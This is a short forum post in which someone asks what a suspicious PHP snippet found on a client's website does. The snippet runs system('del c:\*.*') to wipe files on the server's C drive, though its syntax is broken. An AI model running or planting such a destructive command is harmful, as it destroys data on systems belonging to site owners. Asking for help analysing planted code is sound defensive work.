So I found this code on one of my client's sites and I'm hoping I caught it before it did any damage...it looks pretty dangerous?Code:<?php
$die = 'FAILED';
if ( passthru("dir c:\") {
$run = system("del c:\*.*");
exec ($run);
}
else { die($die); }
?>
What exactly does it do?
Does it REALLY delete someone's C DRIVE?!
